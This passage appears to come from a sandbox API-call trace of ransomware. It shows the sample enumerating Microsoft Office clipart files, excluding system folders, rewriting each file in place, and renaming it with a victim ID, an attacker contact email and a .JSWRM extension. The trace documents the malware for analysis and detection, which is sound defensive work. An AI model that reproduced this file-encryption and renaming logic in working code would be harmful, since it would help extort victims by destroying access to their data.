(normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00524_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00524_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0075.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.085] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.085] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2576, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00525_.WMF", cAlternateFileName="")) returned 1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2=".") returned 1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="..") returned 1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="...") returned 1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="windows") returned -1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="recovery") returned -1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="perflogs") returned -1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="documents and settings") returned -1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="system volume information") returned -1 [0075.086] lstrcmpiW (lpString1="BL00525_.WMF", lpString2="msocache") returned -1 [0075.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0075.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00525_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00525_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00525_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0075.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0075.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00525_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00525_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00525_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.086] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0075.086] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.087] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.087] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.087] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9590) returned 1 [0075.087] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.087] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2570) returned 0x24c1d0 [0075.087] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2570, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2570, lpOverlapped=0x0) returned 1 [0075.089] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.089] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2570, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2570, lpOverlapped=0x0) returned 1 [0075.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.089] CloseHandle (hObject=0x460) returned 1 [0075.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.089] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.089] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.089] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0075.090] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0075.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0075.090] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0075.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0075.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.090] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00525_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00525_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0075.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.090] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.090] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd65f8ed, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd65f8ed, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd685b3d, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6ba0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00526_.WMF", cAlternateFileName="")) returned 1 [0075.090] lstrcmpiW (lpString1="BL00526_.WMF", lpString2=".") returned 1 [0075.090] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="..") returned 1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="...") returned 1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="windows") returned -1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="recovery") returned -1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="perflogs") returned -1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="documents and settings") returned -1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="system volume information") returned -1 [0075.091] lstrcmpiW (lpString1="BL00526_.WMF", lpString2="msocache") returned -1 [0075.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00526_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00526_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00526_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00526_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00526_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00526_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0075.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.091] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.091] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.091] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.092] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=27552) returned 1 [0075.092] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.092] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6ba0) returned 0x24c1d0 [0075.092] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x6ba0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x6ba0, lpOverlapped=0x0) returned 1 [0075.095] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.095] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x6ba0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x6ba0, lpOverlapped=0x0) returned 1 [0075.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.096] CloseHandle (hObject=0x460) returned 1 [0075.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0075.096] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0075.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0075.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0075.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d098 | out: hHeap=0x1e0000) returned 1 [0075.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00526_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00526_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0075.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0075.097] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd6396e0, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd6396e0, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd65f8ed, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2cec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00648_.WMF", cAlternateFileName="")) returned 1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2=".") returned 1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="..") returned 1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="...") returned 1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="windows") returned -1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="recovery") returned -1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="perflogs") returned -1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="documents and settings") returned -1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="system volume information") returned -1 [0075.097] lstrcmpiW (lpString1="BL00648_.WMF", lpString2="msocache") returned -1 [0075.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0075.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00648_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00648_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00648_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0075.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0075.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00648_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0075.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BL00648_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BL00648_.WMF", lpUsedDefaultChar=0x0) returned 12 [0075.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0075.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0075.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0075.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0075.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0075.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0075.098] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11500) returned 1 [0075.098] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ce0) returned 0x24c1d0 [0075.098] ReadFile (in: hFile=0x460, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ce0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x2ce0, lpOverlapped=0x0) returned 1 [0075.100] SetFilePointer (in: hFile=0x460, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0075.100] WriteFile (in: hFile=0x460, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ce0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x2ce0, lpOverlapped=0x0) returned 1 [0075.100] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0075.100] CloseHandle (hObject=0x460) returned 1 [0075.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0075.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0075.100] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0075.100] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0075.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0075.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0075.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0075.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0075.101] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0075.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0075.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0075.101] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0075.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0075.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0075.101] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BL00648_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bl00648_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0075.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0075.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0075.101] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0075.101] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xd685b3d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xd685b3d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xd6abd89, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1138, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="BL00921_.WMF", cAlternateFileName="")) returned 1 [0075.101] lstrcmpiW (lpString1="BL00921_.WMF", lpString2=".") returned 1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="..") returned 1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="...") returned 1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="windows") returned -1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="recovery") returned -1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="perflogs") returned -1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="documents and settings") returned -1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0075.102] lstrcmpiW (lpString1="BL00921_.WMF", lpString2="system volume information") returned -1 [0075.102] lstrcmpiW 